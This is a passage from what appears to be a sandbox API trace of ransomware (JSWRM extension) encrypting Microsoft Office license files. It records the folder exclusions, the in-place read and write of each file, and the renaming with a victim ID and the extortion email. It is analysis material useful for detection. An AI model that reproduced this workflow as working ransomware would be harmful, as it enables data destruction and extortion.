lpWideCharStr=0x0) returned 8 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a450 [0102.630] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a450, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a450 | out: hHeap=0x1e0000) returned 1 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0102.630] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23eae8 [0102.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0102.630] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.630] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-stil.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-stil.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-stil.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-stil.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23eae8 | out: hHeap=0x1e0000) returned 1 [0102.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0102.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d9c8 | out: hHeap=0x1e0000) returned 1 [0102.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241290 | out: hHeap=0x1e0000) returned 1 [0102.631] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0102.631] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe282b673, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe282b673, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe28ea227, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1128, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-ul-oob.xrm-ms", cAlternateFileName="CLIENT~2.XRM")) returned 1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2=".") returned 1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="..") returned 1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="...") returned 1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="windows") returned -1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0102.631] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="documents and settings") returned -1 [0102.632] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.632] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0102.632] lstrcmpiW (lpString1="client-issuance-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2411c8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul-oob.xrm-ms", cchWideChar=29, lpMultiByteStr=0x2410d8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 29 [0102.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.632] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.632] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.632] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.632] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.633] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4392) returned 1 [0102.633] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.633] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1120) returned 0x205850 [0102.633] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1120, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1120, lpOverlapped=0x0) returned 1 [0102.634] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.634] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1120, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1120, lpOverlapped=0x0) returned 1 [0102.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.635] CloseHandle (hObject=0x45c) returned 1 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0102.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0102.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0102.635] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0102.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0102.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0102.635] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0102.636] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2687c83, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2687c83, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe282b673, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x1070, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="client-issuance-ul.xrm-ms", cAlternateFileName="CLIENT~1.XRM")) returned 1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2=".") returned 1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="..") returned 1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="...") returned 1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="windows") returned -1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="recovery") returned -1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="perflogs") returned -1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="documents and settings") returned -1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="system volume information") returned -1 [0102.636] lstrcmpiW (lpString1="client-issuance-ul.xrm-ms", lpString2="msocache") returned -1 [0102.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0102.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0102.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul.xrm-ms", cchWideChar=25, lpMultiByteStr=0x2410d8, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0102.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d920 [0102.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul.xrm-ms", cchWideChar=25, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 25 [0102.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0102.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="client-issuance-ul.xrm-ms", cchWideChar=25, lpMultiByteStr=0x241308, cbMultiByte=25, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="client-issuance-ul.xrm-ms", lpUsedDefaultChar=0x0) returned 25 [0102.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d920 | out: hHeap=0x1e0000) returned 1 [0102.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d728 [0102.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0102.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0102.637] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.638] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=4208) returned 1 [0102.638] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.638] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1070) returned 0x205850 [0102.638] ReadFile (in: hFile=0x45c, lpBuffer=0x205850, nNumberOfBytesToRead=0x1070, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesRead=0x345ec04*=0x1070, lpOverlapped=0x0) returned 1 [0102.639] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.640] WriteFile (in: hFile=0x45c, lpBuffer=0x205850*, nNumberOfBytesToWrite=0x1070, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x205850*, lpNumberOfBytesWritten=0x345ec00*=0x1070, lpOverlapped=0x0) returned 1 [0102.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x205850 | out: hHeap=0x1e0000) returned 1 [0102.640] CloseHandle (hObject=0x45c) returned 1 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0102.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0102.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0102.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0102.640] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0102.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0102.640] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e8b8 [0102.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0102.640] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.640] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\client-issuance-ul.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\client-issuance-ul.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0102.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e8b8 | out: hHeap=0x1e0000) returned 1 [0102.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0102.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0102.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0102.641] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0102.641] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe2f2c57f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe2f2c57f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe305d884, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5169, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ExcelR_Grace-ppd.xrm-ms", cAlternateFileName="EXCELR~3.XRM")) returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2=".") returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="..") returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="...") returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="windows") returned -1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="recovery") returned -1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="perflogs") returned -1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="system volume information") returned -1 [0102.647] lstrcmpiW (lpString1="ExcelR_Grace-ppd.xrm-ms", lpString2="msocache") returned -1 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411f0 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2411f0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 23 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ExcelR_Grace-ppd.xrm-ms", cchWideChar=23, lpMultiByteStr=0x2413d0, cbMultiByte=23, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ExcelR_Grace-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 23 [0102.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d9c8 [0102.648] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d728 | out: hHeap=0x1e0000) returned 1 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0102.648] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0102.648] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0102.648] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ExcelR_Grace-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\excelr_grace-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0102.648] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20841) returned 1 [0102.648] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.649] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5160) returned 0x24c1d0 [0102.649] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5160, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5160, lpOverlapped=0x0) returned 1 [0102.651] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0102.651] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5160, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5160, lpOverlapped=0x0) returned 1 [0102.651] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0102.651] CloseHandle (hObject=0x45c) returned 1 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d5d8 [0102.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0102.652] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0102.652] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0102.652] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0102.652] 